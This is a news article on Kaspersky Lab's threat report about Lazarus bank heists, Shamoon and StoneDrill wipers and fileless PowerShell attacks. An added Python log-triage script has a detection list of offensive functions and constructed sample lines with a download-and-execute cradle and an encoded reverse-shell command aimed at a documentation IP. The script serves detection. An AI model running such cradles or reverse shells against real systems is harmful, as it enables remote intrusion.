A North Korea-linked hacking group responsible for multiple financial and destructive attacks is believed to be the most serious threat against banks, security firm Kaspersky Lab says.
The group, referred to as BlueNoroff or Lazarus, has been associated with numerous high profile attacks over the past several years, including the devastating attack against Sony Pictures in late 2014. Last year’s $81 million cyber heist from Bangladesh’s account at the New York Federal Reserve Bank has been attributed to this group as well.
The actor is also believed to have orchestrated an attack aimed at banks in Poland earlier this year, in which the website of the Polish Financial Supervision Authority (knf.gov.pl) was compromised and abused to deliver malware. The hackers inserted Russian words into the malware used in this attack as a decoy (a false flag), security researchers discovered.
Active since 2009 or earlier, Lazarus is believed to have been conducting a large campaign aimed at financial institutions worldwide. The operation is ongoing, with the most recent malware samples found in March. Kaspersky Lab says that currently the group “is probably the most serious threat against banks.”
BlueNoroff/Lazarus is, however, only one of the more than 100 threat actors and sophisticated malicious operations that Kaspersky Lab is monitoring at the moment. The attacks target commercial and government organizations in over 80 countries and show these actors converging, with both Advanced Persistent Threat (APT) actors and financially motivated cybercriminals increasingly using the same tactics, techniques, and procedures (TTPs).
Other destructive activity during the first quarter of the year came from Shamoon and StoneDrill, two malware families attributed to separate actors whose interests appear aligned and who might be working together. Both were aimed at Saudi targets, and both pack disk-wiping capabilities, which makes them extremely destructive.
According to Kaspersky, StoneDrill appears to have been around since 2014, with old samples attributed to the NewsBeef (Charming Kitten) group. The samples share the same credentials (username and password) for command and control (C&C) communications, and the security researchers suggest that StoneDrill might be a more recent version of NewsBeef artifacts.
Recently, StoneDrill was also used in attacks against targets in the energy industry in Europe, which the security researchers read as a sign that the actor is expanding its reach beyond the Middle East.
Another piece of malware related to the Shamoon attacks is Ismdoor, a backdoor used in Saudi Arabia to target the oil and energy industry. The attackers were also found to have relied mainly on PowerShell-based tools for lateral movement, and to have adopted the growing trend of using generic, fileless tooling (in-memory payloads that leave no executable on disk) for their operations.
The use of generic tools in attacks has traditionally been associated mainly with “not-so-big actors or cybercriminals,” who would not build their own set of malicious programs. Some of the publicly available frameworks that offer many options, especially for lateral movement, include Nishang, Empire and Powercat, all of which are written in PowerShell, and Meterpreter, the Metasploit payload, which is not itself PowerShell-based but is routinely delivered and controlled through it; all of them support fileless, in-memory backdoors.
“We have seen such techniques being widely adopted in the last few months. We find examples in the lateral movement tools used in Shamoon attacks, in attacks against Eastern European banks, and used by different APT actors such as CloudComputating, Lungen or HiddenGecko, as well as in the evolution of old backdoors like Hikit, which evolved to new fileless versions,” Kaspersky Lab explains.
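As an added example of how the PowerShell-based, fileless tradecraft described above shows up in telemetry (this is editor-supplied code, not code from the article, from Kaspersky Lab or from any of the frameworks named), the following Python triages process-creation and script-block log lines: it decodes `-EncodedCommand` arguments (base64 over UTF-16LE, the encoding PowerShell expects), flags evasive launch switches, and matches function names typical of download cradles and of Nishang, Empire and Powercat. The log field layout, the indicator list and the sample lines are constructed assumptions, not a vendor schema or real captured events.

```python
"""Triage PowerShell command lines / script blocks for fileless-malware tradecraft.

Added example by the editor; not code from the article or from Kaspersky Lab.
The log lines below are constructed to resemble Windows Security 4688 (process
creation) and PowerShell 4104 (script block) events; the field layout and the
indicator list are assumptions, not a vendor schema.
"""
import base64
import re

# Function/API names typical of in-memory download-and-execute cradles and of
# the PowerShell frameworks the article names (Nishang, Empire, Powercat).
INDICATORS = (
    "IEX", "Invoke-Expression", "DownloadString", "DownloadData",
    "FromBase64String", "Invoke-Mimikatz", "Invoke-Shellcode",
    "Invoke-PowerShellTcp", "Invoke-ReflectivePEInjection", "powercat",
    "Net.Sockets.TCPClient", "Reflection.Assembly",
)

# Launch switches that hide the window, skip the profile or execution policy,
# or pass an encoded payload: all common in non-interactive, fileless use.
EVASIVE_FLAGS = re.compile(
    r"(?i)(?:-nop\b|-noprofile|-w(?:indowstyle)?\s+hidden|"
    r"-e(?:p|xecutionpolicy)\s+bypass|-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,})"
)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc).
ENCODED_ARG = re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(text):
    """Return the UTF-16LE payload behind -EncodedCommand, or '' if none/invalid."""
    m = ENCODED_ARG.search(text)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score(text):
    """Score one command line or script block; returns (score, reasons)."""
    reasons = []
    decoded = decode_encoded_command(text)
    if decoded:
        reasons.append("encoded command: " + decoded[:60])
    if EVASIVE_FLAGS.search(text):
        reasons.append("evasive launch flags")
    # Match indicators against the decoded payload, not the base64 blob itself,
    # so random base64 characters cannot produce false substring hits.
    haystack = (ENCODED_ARG.sub(" ", text) + " " + decoded).lower()
    reasons.extend("indicator: " + i for i in INDICATORS if i.lower() in haystack)
    return len(reasons), reasons


def triage(lines, threshold=2):
    """Return (index, score, reasons) for lines scoring at or above the threshold.

    A single evasive flag is too noisy on its own (administrators routinely run
    local scripts with -ExecutionPolicy Bypass), so a second signal is required.
    """
    out = []
    for i, line in enumerate(lines):
        s, reasons = score(line)
        if s >= threshold:
            out.append((i, s, reasons))
    return out


# Constructed sample payload (a Nishang-style reverse-shell invocation) in the
# form PowerShell expects for -EncodedCommand: base64 over UTF-16LE text.
ENCODED_PAYLOAD = "Invoke-PowerShellTcp -Reverse -IPAddress 198.51.100.7 -Port 4444"
ENCODED_ARGUMENT = base64.b64encode(ENCODED_PAYLOAD.encode("utf-16-le")).decode("ascii")

# Constructed log lines (not real events).
SAMPLE_LOG = [
    # 0: classic download cradle, hidden window, no profile
    "EventID=4688 NewProcessName=powershell.exe CommandLine=powershell.exe -nop -w hidden "
    "-c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')\"",
    # 1: policy bypass alone, benign script (common administrative usage)
    "EventID=4688 NewProcessName=powershell.exe CommandLine=powershell.exe "
    "-ExecutionPolicy Bypass -File C:\\ops\\backup.ps1",
    # 2: encoded command carrying the reverse-shell invocation above
    "EventID=4688 NewProcessName=powershell.exe CommandLine=powershell.exe -enc " + ENCODED_ARGUMENT,
    # 3: ordinary interactive script block
    "EventID=4104 ScriptBlockText=Get-ChildItem C:\\Users | Measure-Object",
]

if __name__ == "__main__":
    for idx, s, reasons in triage(SAMPLE_LOG):
        print(f"line {idx}: score {s}: " + "; ".join(reasons))
```

Run against the constructed log, lines 0 and 2 are flagged and the benign `-ExecutionPolicy Bypass` invocation is not. The same logic applies to 4104 script-block text, which is the more valuable source for in-memory tooling because an encoded or downloaded stage is logged in decoded form after it runs; enabling script block logging is therefore the first step in catching the frameworks named above.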